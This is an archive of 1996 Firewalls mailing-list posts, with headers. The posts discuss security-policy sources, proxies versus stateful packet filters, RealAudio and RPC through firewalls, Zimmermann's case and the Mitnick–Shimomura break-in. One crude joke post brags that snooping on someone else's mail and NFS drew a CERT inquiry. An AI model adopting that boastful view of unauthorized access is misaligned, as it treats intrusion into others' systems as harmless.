today I responded to Andrew Cameron's question about security policies. I _thought_ I had cc'd the list, but obviously didn't. I should not try to do anything involving the cognitive faculties before I have finished my first pot of coffee. ;-) Anyway, the question I posed to All still holds. Regards, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- ---------- Forwarded message ---------- On Wed, 10 Jan 1996, Andrew Cameron wrote: > I would like to know where I can find examples of an Internet/Security > Policy for a company. > > I will need to write one in the near future and would like to draw on > the experiance of others. > > Thanks in anticipation > > ----------------------------------------------------------------------------- > > Andrew Cameron > Internet : andrew@andy.alt.za > X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400 > > ---------------------------------------------------------------------------- The best online source for security policies that I've found is: ftp://coast.cs.purdue.edu/pub/doc/policy It includes a lot of academic policies and a selection of various governmental policies and standards. There are also a few Federal examples at: http://www.first.org Query to All: This ("Where can I find policies online?") is a recurring question on Firewalls. I've not chased down the FAQ lately. Has this question yet been added to it? Regards, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- From firewalls-owner Thu Jan 11 13:59:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28827 for firewalls-outgoing; Thu, 11 Jan 1996 11:17:24 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA28819 for ; Thu, 11 Jan 1996 11:16:34 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzybz07856; Thu, 11 Jan 1996 13:55:46 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA26453; Thu, 11 Jan 96 13:45:57 EST Date: Thu, 11 Jan 1996 13:45:56 -0500 (EST) From: Sick Puppy Subject: Relijon, Firewalls, Filosofi To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Relijon I spent my New Year vacation chewing mushrooms and peeing on cactus in the Arizona desert. Ah am right proud to say that I growed the mushrooms myself by following the Gingrich Guidelines for Managing Federal Employees, "Keep them in the dark and feed them bullshit." As I was carefully licking my wounds and looking for a cactus with a lot less spikes than the last one, I found two paper plates, twelve empty beer cans and a fragile roll of parchment covered in a strange brown script. Cos it was fragile, I took the roll to Dockmaster, The Master of All Mushrooms, and asked for an instant decode of the strange script. When I got the decode, one week later, I wondered aloud "do they employ cryptanalysts who smoke but don't inhale?" But then I realized, it was a Book of RevelAshuns, from The Church of the Dead Meow. It sez In the Beginning there was RedBeard and he dreamed of strange machines called fyrewalz. Then Gwad created Red Boots but she (Red Boots) had no respect for RedBeard because she knew he was only after one thing, (an unpaid assistant to help write neat code). Red Boots stomped all over RedBeard with her long spiky 6 inch heels but he loved it and they begat a firewall. And that firewall begat other firewalls. Firewalls Now suppose that I had to use a Firewall-1 machine and wanted to tighten up security by adding authentication and encryption. I heard that V-One has a couple of add-on products, one called SmartGate, the other called SmartCAT (there ain't no such animal) which can provide the authentication and encryption on top of another vendors packet filtering firewally. Does anyone have any experience running this stuff on top of Firewall-1? As I ponder connecting my systems at home to the Internet through a 500 kbps cable modem and the cable television network, I also wonder what my options are for an El Cheapo but effective firewall to protect my personal stuff. Filosfi Now not too long ago there was a serious misunderstanding about the educational research I was doing on someone else's mail and NFS. I got this real polite e-mail from CERT asking if I knew anything about the origin of the "attacks". Now being a simple country dawg, I reckon that being investigated by CERT should be worn like a badge of honour. Can I legitimately claim in my postings that I am CERTified? Sinc my last posting, several people asked which consultant I was talking about at TIS. Why its Char of course, the one who wears smudged makeup and grey granny dresses. Miss Char Broil brought her secret sauce to TIS last year when she left the ATF at Waco, Texas. Yeah, I know that stinks, but then so do many of the things I eat. Frankly, I find it amazing that anyone is fool enought to believe that I actually know anyone at TIS. No flames please. The subject line was enough to let you know what was next to the fire hydrant. But you stepped right into it. Sick Puppy, the Cat_Eating_Dawg SchniffMeisterCracker From firewalls-owner Thu Jan 11 14:14:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28768 for firewalls-outgoing; Thu, 11 Jan 1996 11:14:54 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28753 for ; Thu, 11 Jan 1996 11:13:58 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id OAA13809; Thu, 11 Jan 1996 14:13:10 -0500 From: "Marcus J. Ranum" Message-Id: <199601111913.OAA13809@switchblade.v-one.com> Subject: Re: Firewalls-Digest V5 #14 To: murrell@bctel.net (Brian Murrell) Date: Thu, 11 Jan 1996 14:13:09 -0500 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199601111705.JAA18920@mocha.bctel.net> from "Brian Murrell" at Jan 11, 96 09:05:29 am Reply-To: mjr@switchblade.v-one.com Organization: V-One Corporation, Baltimore, MD Office URL: Mjr's page Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brian Murrell writes: >Real Audio can be handled by a "stateful packet >filter". Firewall-1 have recently put some filtering rules on their Web site >for FW-1 users to add to their rulebase to allow RealAudio in. I checked just >to make sure they weren't opening the big hole. The datastream does seem to >carry the return port in the clear much like FTP's data connection PORT The mode most people want to run their firewall in is: "What goes out can come back in" "What wasn't invited in, isn't welcome" a sort of a one-way mirror so that the folks behind it can do whatever they want to the 'net but the 'net can't do whatever it wants to them. Based on that goal, the requirement of the firewall is to have some level of "understanding" of what went out, and whether or not to let responses back in. The rest is an implementation detail. It's a *BIG* implementation detail, but it's just an implementation detail. If Checkpoint's product is "smart" enough to provide the desired connection semantics, it makes little difference to me whether it's application level or network level implementation - as long as the goal is accomplished. The argument of "application level" versus "smart packet filtering" or "dynamic screening" or whatever it's being called this week is a really silly one. The question is: DOES THE THING DO WHAT IT HAS TO DO? Classical application level proxies are an implementation detail based on the ease with which one can take advantage of the kernel's state-maintenance for TCP sessions, and the fact that it is easier to write application code than kernel code, if you haven't got a kernel source license. That's it. Where things get interesting is when the smart packet filters get to the point where they can perform very detailed checks (checks which, typically, are easier to do in application code than kernel code) if those are what is required. I see a lot of firewalls that use plug-gw all over the place. As far as I am concerned, plug-gw is axiomatically equal to allowing a hole through a router. The firewall is a no-op except for the audit trail. Therefore, a router with a hole, and a sniffer with a log are equal to the firewall in that case (only faster). In *SOME* cases, some of the classical application firewalls are able to do extra tricks or logging. Proxy HTTP firewalls, for example, or SMTP queuing systems which rewrite or search for evil addresses. If, supposing, someone had similar capabilities in the kernel of their smart packet filter, then what is the difference between user mode code and kernel code? (hint: one is harder to write, one is less portable, one is faster, one is more expensive) None of those properties, other than "harder to write" impacts security significantly. Where things get really fascinating is in the case where the firewall allows direct unsolicited incoming traffic to an application behind it. This could be either a smart packet filter that has been told to allow all traffic in on port 25, or a router, or a classic application level firewall that has been configured to plug-gw all port 25 traffic to an internal mailhub. In that case, I submit to you that the 3 firewalls are equal except in cost, complexity, and performance. If the application you're talking to is sendmailV3.4 the firewall is completely moot. *THAT* is why, traditionally, I have been leery of smart packet filters. They don't provide much extra control over the application stream. But neither does plug-gw. It depends a hell of a lot on what you're pumping over that application stream!!! This is why I believe that the correct approach is to SECURE THE APPLICATION STREAM BEFORE YOU LET IT THROUGH, which is the work I am doing at V-ONE. But that is another story. :) >However, is the RPC >infrastructure itself without any actual RPC programs insecure?? Not really. There are the usual distinctions to make between a protocol and its implementation. :) Portmapper, for example, used to contain a few undocumented builtins, some of which could be coerced into doing interesting things to your machine. But, the infrastructure itself is fine. Indeed, if you code an RPC application and then put a "signed request" syntax into your procedure calls, you can build a mighty secure application!! Nobody does that kind of thing, though. :( >Does it have >any vulnerabilities in and of itself, or is the nature of RPC and how it maps >ports (somewhat randomly) from a pool that you find insecure?? Nope. The problem with RPC is that most of the time, because of that random behaviour, existing firewall and security technologies can't cope with it. So you have a deadly combination of incompetently designed applications (from a security perspective) with the desire to simply shunt them through the firewall. This is bad. There's nothing INHERENTLY wrong with RPC, but the suite of tools that use it mostly stink. :) Sorry about the long-winded answer. mjr. ---- Chief Scientist, V-ONE Corporation work http://www.v-one.com personal http://www.clark.net/pub/mjr/mjr-top.html From firewalls-owner Thu Jan 11 14:29:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01985 for firewalls-outgoing; Thu, 11 Jan 1996 13:24:26 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01980 for ; Thu, 11 Jan 1996 13:24:21 -0800 (PST) Received: from pm4-22.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA25204; Thu, 11 Jan 96 16:23:15 -0500 Date: Thu, 11 Jan 96 16:23:15 -0500 Message-Id: <9601112123.AA25204@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Newsbreak - Justice Dept. decides not to prosecute Phil Zimmermann Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It was just announced in the Cypherpunks mailing list that the Justice Dept. decided not to prosecute Phil Zimmermann. The mail pointed to several references: http://www.eff.org/~mech/ http://www.eff.org/ http://www.eff.org/A/ Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Thu Jan 11 14:56:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03346 for firewalls-outgoing; Thu, 11 Jan 1996 14:13:37 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03341 for ; Thu, 11 Jan 1996 14:13:31 -0800 (PST) Received: from subzero (dufresne@subzero.winternet.com [198.174.169.6]) by icicle (8.6.12/8.6.12) with ESMTP id QAA13020; Thu, 11 Jan 1996 16:12:18 -0600 Received: (from dufresne@localhost) by subzero (8.6.12/8.6.12) id QAA14085; Thu, 11 Jan 1996 16:11:44 -0600 Posted-Date: Thu, 11 Jan 1996 16:11:44 -0600 Date: Thu, 11 Jan 1996 16:11:44 -0600 (CST) From: Ron DuFresne To: Brain21 cc: Ng Pheng Siong , Frank Willoughby , firewalls@GreatCircle.COM, John Young Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brain21 wrote: > On Thu, 11 Jan 1996, Ng Pheng Siong wrote: > > > > > Shimomura had almost complete packet traces of the break-in, which > > allowed him to reconstruct the attack. False! Mitnick hid his tracks farr too well to be traced in any fashoin via logs. All tracks pointed to places far far away, almost to the point of appearing to come from never-never land... Took electronic eavsdropping and the tracing of compromised phone switches to locate mitnick to N.C alone... > > > > It was a trap. > > > Personally I can not conclude that from what you have stated. I would > hope that he would be logging stuff as a matter of course. How did he > KNOW that Mitnick or any one was going to attack his machine > specifically? If it were done "to see what happens" then maybe I could > buy it, but if it were "a trap for Mitnick" he would have to be psychic > as well. > > Brain21 > Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Jan 11 15:14:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05267 for firewalls-outgoing; Thu, 11 Jan 1996 14:55:18 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA05260; Thu, 11 Jan 1996 14:55:11 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id OAA18278; Thu, 11 Jan 1996 14:54:11 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma018276; Thu Jan 11 14:54:03 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id OAA19497; Thu, 11 Jan 1996 14:54:14 -0800 (PST) Date: Thu, 11 Jan 1996 14:54:14 -0800 (PST) From: Brian Murrell Message-Id: <199601112254.OAA19497@mocha.bctel.net> To: murrell@bctel.net, Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com, Brent@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #14 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: z8jI5+ZA3tRxySPTLFyerw== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Two problems here. First, not everybody has Firewall-1 filtering systems, > or any other stateful filtering system. It's good that those who do can > deal with RealAudio, but it doesn't change the fact that the RealAudio > protocol is poorly designed, at least from a security point of view. No argument here. I would prefer to proxy it, that way the audience is bigger. Some people are happy with stateful filtering, however others will go no closer to the edge than proxies. > Second, even this only works if all you want are outgoing connections. Yeah. I'm not sure of the point. I'll assume that you are talking about putting a RA server behind a firewall. I have not actually watched a trace of RealAudio, but I would presume that the server is contacted by the client on a predefined port. That being, you would put a filter in your router for it much like HTTP, etc. The response traffic (which is the problematic undetermined UDP port problem) would be outbound from the FW's point of view. Do you normally restrict outbound UDP traffic on your filters?? (Sounds sarcastic - is not). > Again, only if all you want to allow are outgoing connections. I don't think so. I've yet to actually implement RPC (not sure I want to :-) services on FW-1, so conjecture follows... however I would think that you can setup filters to allow portmapper traffic in and out. FW-1 will watch that learn what services are on what ports on various machines. Additional rules can then be set up to allow/disallow certain RPC services to and from certain machines. > It's the nature of RPC that makes it difficult to control. You can't > easily allow some RPC-based services and disallow others. You can't easily > disallow all RPC-based services, even. Assuming the above conjecture as fact, I would think you can. You could be as specific as you want, no?? Thanx for the POV. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Jan 11 16:29:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA09275 for firewalls-outgoing; Thu, 11 Jan 1996 16:07:04 -0800 (PST) Received: from case.cyberspace.com (case.cyberspace.com [199.2.48.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA09270 for ; Thu, 11 Jan 1996 16:06:50 -0800 (PST) Received: from case.cyberspace.com ([199.2.48.12]) by case.cyberspace.com (post.office MTA v1.9.1 ID# 0-11430) with SMTP id AAA26978 for ; Thu, 11 Jan 1996 16:04:56 -0800 Date: Thu, 11 Jan 1996 16:04:55 -0800 (PST) From: billcurr@cyberspace.com (Bill Curr) To: firewalls@greatcircle.com Subject: "Title for Firewall Admin? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The mail administrator is "postmaster" The web server admin is "webmaster" Is there such a title for a firewall administrator? And is there a list of these colorful "nom de nets" anywhere? -Thanks Bill From firewalls-owner Thu Jan 11 16:44:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08646 for firewalls-outgoing; Thu, 11 Jan 1996 15:57:13 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.235.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08641 for ; Thu, 11 Jan 1996 15:57:08 -0800 (PST) Received: (karyn@localhost) by diablo.cisco.com (8.6.10/CISCO.SERVER.1.1) id PAA01980; Thu, 11 Jan 1996 15:59:41 -0800 From: Karyn Pichnarczyk Message-Id: <199601112359.PAA01980@diablo.cisco.com> Subject: PLEASE discontinue thread on Tsutomu and Mitnick To: dufresne@winternet.com (Ron DuFresne) Date: Thu, 11 Jan 1996 15:59:40 -0800 (PST) Cc: brain21@montag33.residence.gatech.edu, Doug.Hughes@Eng.Auburn.EDU, firewalls@GreatCircle.COM In-Reply-To: X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would you people please stick to the subject of this mailing list and take your Tsutomu theories off of firewalls? If you are wondering what Tsutomu was thinking, why don't you simply ASK HIM. He's on the net. If he wants to answer, he will. If not, you lose. You can always read his book or the other one on Mitnick if you want more insight. But I think I speak for most people on this list when I ask you to please take your petty conjectures of Tsutomu's motivations offline. Thank you, karyn From firewalls-owner Thu Jan 11 16:59:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11722 for firewalls-outgoing; Thu, 11 Jan 1996 16:46:21 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11710 for ; Thu, 11 Jan 1996 16:46:14 -0800 (PST) Received: from pm3-26.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA08155; Thu, 11 Jan 96 19:45:14 -0500 Date: Thu, 11 Jan 96 19:45:14 -0500 Message-Id: <9601120045.AA08155@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Newsbreak - Justice Dept. decides not to prosecute Phil Zimmermann Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FWIW, I double-checked with EFF & confirmed the statement that the investigation of Phil Zimmermann is indeed over. EFF said that they will post a message in the "Alert" section. A pointer to the "Alert" section is located on their home page. BTW, the references I posted were from the original author's sig file. Sorry for the confusion. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Thu Jan 11 17:29:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14071 for firewalls-outgoing; Thu, 11 Jan 1996 17:23:12 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14065; Thu, 11 Jan 1996 17:23:04 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 17:23:23 +0100 To: billcurr@cyberspace.com (Bill Curr), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 4:04 PM 1/11/96, Bill Curr wrote: >The mail administrator is "postmaster" >The web server admin is "webmaster" >Is there such a title for a firewall administrator? scapegoat -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Thu Jan 11 17:35:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14125 for firewalls-outgoing; Thu, 11 Jan 1996 17:24:16 -0800 (PST) Received: from deimos (pm001-22.dialip.mich.com [198.108.16.151]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14111 for ; Thu, 11 Jan 1996 17:24:02 -0800 (PST) Received: (from root@localhost) by deimos (8.6.10/8.6.9) id UAA00248; Thu, 11 Jan 1996 20:22:38 -0500 Date: Thu, 11 Jan 1996 20:22:35 -0500 (EST) From: Tom Zerucha Reply-To: zerucha@shell.portal.com To: "Paul A. Fisher" cc: firewalls@GreatCircle.COM Subject: Re: Allow SSL through a firewall? In-Reply-To: <9601101859.AA09343@ci.deere.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I haven't tried this, but you might be able to get SOCKS to work in reverse. SSL works from Web Browsers through a socks firewall, but you need to set the proxy entry in the server. Then configure SOCKS on the bastion host to allow only connections from the client's range of IP addresses to the Commerce HTTPS server only using the 443 port. zerucha@shell.portal.com finger zerucha@jobe.portal.com for PGP key From firewalls-owner Thu Jan 11 17:44:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14781 for firewalls-outgoing; Thu, 11 Jan 1996 17:36:11 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14761 for ; Thu, 11 Jan 1996 17:35:58 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id TAA29029; Thu, 11 Jan 1996 19:33:35 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id TAA06437; Thu, 11 Jan 1996 19:33:34 -0600 Posted-Date: Thu, 11 Jan 1996 19:33:34 -0600 Date: Thu, 11 Jan 1996 19:33:34 -0600 (CST) From: Ron DuFresne To: Mike Tighe cc: Scott_Rickard@mc.xerox.com, firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, jya@pipeline.com, frankw@in.net Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG In-Reply-To: <199601111510.JAA20468@softserv.tcst.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Mike Tighe wrote: > Rickard,Scott writes: > > >>I would like to know this... if Shimomura is so good (an I actually > >>believe that he may be) then why did he leave the r-utils enabled? Why > >>did he not use TCPWrappers to prevent spoofing? Why did he allow people > >>to see inside his network (Mitnick saw that there was a machine > >>"X-something" that he believed was trusted by Shimomura's machine)? > > Obviously there were some holes in his system that should have been > plugged, but that does not mean it was his responsibility to have fixed > them? > > Actually, since it was T. S.'s HOME machine, I'd venture that it was his responsibility. Let's not for get the fact that T. S.'s box had 'special' tools T. S. had that enabled Mitnick to further his attacks, all the more reason that this box should have had very strict security, don't you think? Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Jan 11 17:44:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA13844 for firewalls-outgoing; Thu, 11 Jan 1996 17:19:19 -0800 (PST) Received: from arthur.cs.purdue.edu (arthur.cs.purdue.edu [128.10.2.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA13830 for ; Thu, 11 Jan 1996 17:19:05 -0800 (PST) Received: from narnia.cs.purdue.edu (swlodin@narnia.cs.purdue.edu [128.10.17.74]) by arthur.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) with ESMTP id ; Thu, 11 Jan 1996 20:18:08 -0500 Received: (swlodin@localhost) by narnia.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) id ; Thu, 11 Jan 1996 20:18:04 -0500 From: swlodin@cs.purdue.edu (Steve Lodin) Message-Id: <199601120118.UAA21888@narnia.cs.purdue.edu> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG To: brain21@montag33.residence.gatech.edu (Brain21) Date: Thu, 11 Jan 1996 20:18:02 -0500 (EST) Cc: frankw@in.net, firewalls@greatcircle.com In-Reply-To: from "Brain21" at Jan 11, 96 01:09:12 pm X-URL: http://www.cs.purdue.edu/people/swlodin X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone asked about the Tubed information. Part of what Ed pointed was my CMAD Workshop report where Tsutomu first publically announced the breakin. It is available at: http://www.cs.purdue.edu/homes/swlodin/cmad/report.html My wife said that Mitnick and Shimomura will be featured on Dateline tomorrow (Friday). Can anyone confirm? Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ From firewalls-owner Thu Jan 11 18:14:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA14701 for firewalls-outgoing; Thu, 11 Jan 1996 17:35:07 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA14687; Thu, 11 Jan 1996 17:34:57 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 17:35:16 +0100 To: Brian Murrell , Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Firewalls-Digest V5 #14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 2:54 PM 1/11/96, Brian Murrell wrote: >> Second, even this only works if all you want are outgoing connections. > >Yeah. I'm not sure of the point. I'll assume that you are talking about >putting a RA server behind a firewall. I have not actually watched a trace of >RealAudio, but I would presume that the server is contacted by the client on a >predefined port. That being, you would put a filter in your router for it >much >like HTTP, etc. The response traffic (which is the problematic >undetermined UDP >port problem) would be outbound from the FW's point of view. Do you normally >restrict outbound UDP traffic on your filters?? (Sounds sarcastic - is not). I wasn't speaking just of RealAudio; I was talking about this situation in general, where you're trying to reverse engineer some protocol. "Talk" is another example of a messy protocol that's hard or impossible to safely allow through a filtering system, stateful or otherwise; see the discussion of it on pp. 270-272 of my book "Building Internet Firewalls" (by the way, in figure 8-11 on p. 271, the lower box in the "Host 2" area should be labelled "Answering Client", not "Answering Server"). Basicly, you've got to allow outgoing UDP packets, incoming UDP packets, and an incoming TCP connection in order for an outbound "talk" session (where one of your users calls someone at another site) to function. >> Again, only if all you want to allow are outgoing connections. > >I don't think so. I've yet to actually implement RPC (not sure I want to :-) >services on FW-1, so conjecture follows... however I would think that you can >setup filters to allow portmapper traffic in and out. FW-1 will watch that >learn what services are on what ports on various machines. Additional >rules can >then be set up to allow/disallow certain RPC services to and from certain >machines. You could do theoretically do it, but it's complicated. Complicated is bad, in a security sense. Complicated means that there are lots of little nooks and crannies for problems to hide in. Most of us have looked at traditional RPC-based services (YP/NIS, NFS, etc.) and decided that they weren't something we wanted to allow access to from beyond our perimeters anyway. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Thu Jan 11 19:28:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18398 for firewalls-outgoing; Thu, 11 Jan 1996 18:54:12 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18363 for ; Thu, 11 Jan 1996 18:53:57 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id SAA04948; Thu, 11 Jan 1996 18:50:58 -0800 Received: from ix2.ix.netcom.com(199.182.120.1) by mycroft via smap (V1.3mjr) id sma004933; Thu Jan 11 18:50:06 1996 Received: from ix-wp1-08.ix.netcom.com by ix2.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id SAA27489; Thu, 11 Jan 1996 18:51:10 -0800 Date: Thu, 11 Jan 1996 18:51:10 -0800 Message-Id: <199601120251.SAA27489@ix2.ix.netcom.com> X-Sender: sgfarkas@ix.netcom.com (Unverified) X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Andrew Cameron , firewalls@greatcircle.com From: SorG Farkas Subject: Re: Internet Policy/Security Policy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check out the http://all.net site. They have lots of useful info. At 10:11 PM 1/10/96 +0200, Andrew Cameron wrote: > >I would like to know where I can find examples of an Internet/Security >Policy for a company. > >I will need to write one in the near future and would like to draw on >the experiance of others. > >Thanks in anticipation > >----------------------------------------------------------------------------- > >Andrew Cameron >Internet : andrew@andy.alt.za >X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400 > >---------------------------------------------------------------------------- > > > From firewalls-owner Thu Jan 11 19:32:24 1996 Received: (majordom@localhost) by miles.greatcircle.com 